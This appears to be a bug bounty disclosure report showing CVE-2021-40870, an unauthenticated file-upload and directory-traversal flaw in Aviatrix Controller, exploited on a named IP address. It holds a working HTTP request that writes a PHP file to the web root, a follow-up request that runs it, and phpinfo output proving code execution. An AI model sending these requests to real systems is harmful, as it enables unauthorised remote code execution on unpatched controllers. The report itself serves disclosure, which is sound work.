Elastic: CVE-2021-40870 on [52.204.160.31]

An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.

The IP has a SSL certificate pointing to ElasticSearch.
curl -kv https://52.204.160.31

Output

 Server certificate:
*  subject: C=US; ST=California; L=Mountain View; O=Elasticsearch, Inc.; CN=*.elasticit.co

Steps To Reproduce

First, run this request:

POST /v1/backend1 HTTP/1.1
Host: 52.204.160.31
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php&data=RCE<?php phpinfo()?>

The retrieve the content from file 1yv4QQmkj4h4OdmmyT11tkiGf5M.php

GET /v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php HTTP/1.1
Host: 52.204.160.31
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

Which is basically the output of the phpinfo function:

Response (truncated):

tr class="h"&gt;<th>Variable</th><th>Value</th></tr>
<tr><td>SCRIPT_URL </td><td>/v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php </td></tr>
<tr><td>SCRIPT_URI </td><td>https://52.204.160.31:8443/v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php </td></tr>
<tr><td>HTTPS </td><td>on </td></tr>
<tr><td>SSL_SERVER_S_DN_C </td><td>US </td></tr>
<tr><td>SSL_SERVER_S_DN_ST </td><td>California </td></tr>
<tr><td>SSL_SERVER_S_DN_L </td><td>Mountain View </td></tr>
<tr><td>SSL_SERVER_S_DN_O </td><td>Elasticsearch, Inc. </td></tr>
<tr><td>SSL_SERVER_S_DN_CN </td><td>*.elasticit.co </td></tr>
<tr><td>SSL_SERVER_I_DN_C </td><td>US </td></tr>
<tr><td>SSL_SERVER_I_DN_O </td><td>DigiCert Inc </td></tr>
<tr><td>SSL_SERVER_I_DN_CN </td><td>DigiCert SHA2 Secure Server CA </td></tr>
<tr><td>SSL_SERVER_SAN_DNS_0 </td><td>*.elasticit.co </td></tr>
<tr><td>SSL_SERVER_SAN_DNS_1 </td><td>elasticit.co </td></tr>
<tr><td>SSL_VERSION_INTERFACE </td><td>mod_ssl/2.4.39 </td></tr>
<tr><td>SSL_VERSION_LIBRARY </td><td>OpenSSL/1.1.1b </td></tr>
<tr><td>SSL_PROTOCOL </td><td>TLSv1.2 </td></tr>
<tr><td>SSL_SECURE_RENEG </td><td>true </td></tr>
<tr><td>SSL_COMPRESS_METHOD </td><td>NULL </td></tr>
<tr><td>SSL_CIPHER </td><td>ECDHE-RSA-AES128-GCM-SHA256 </td></tr>
<tr><td>SSL_CIPHER_EXPORT </td><td>false </td></tr>
<tr><td>SSL_CIPHER_USEKEYSIZE </td><td>128 </td></tr>
<tr><td>SSL_CIPHER_ALGKEYSIZE </td><td>128 </td></tr>
<tr><td>SSL_CLIENT_VERIFY </td><td>NONE </td></tr>
<tr><td>SSL_SERVER_M_VERSION </td><td>3 </td></tr>
<tr><td>SSL_SERVER_M_SERIAL </td><td>093CE89EF93EE5F18D1E07099ACC5AF9 </td></tr>
<tr><td>SSL_SERVER_V_START </td><td>Mar 20 00:00:00 2020 GMT </td></tr>
<tr><td>SSL_SERVER_V_END </td><td>Mar 25 12:00:00 2022 GMT </td></tr>
<tr><td>SSL_SERVER_S_DN </td><td>CN=*.elasticit.co,O=Elasticsearch\, Inc.,L=Mountain View,ST=California,C=US </td></tr>
<tr><td>SSL_SERVER_I_DN </td><td>CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US </td></tr>
<tr><td>SSL_SERVER_A_KEY </td><td>rsaEncryption </td></tr>
<tr><td>SSL_SERVER_A_SIG </td><td>sha256WithRSAEncryption </td></tr>
<tr><td>SSL_SESSION_ID </td><td>9cf6b4b42df9e371982120b49d57f9112c19df3722fb87d15cc592f73e1fa406 </td></tr>
<tr><td>SSL_SESSION_RESUMED </td><td>Initial </td></tr>
<tr><td>HTTP_HOST </td><td>52.204.160.31 </td></tr>
<tr><td>HTTP_USER_AGENT </td><td>Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 </td></tr>
<tr><td>HTTP_CONNECTION </td><td>close </td></tr>

Impact

• An unauthenticated, 3rd-party attacker or adversary can execute remote code

Supporting Material/References

https://vulners.com/cve/CVE-2021-40870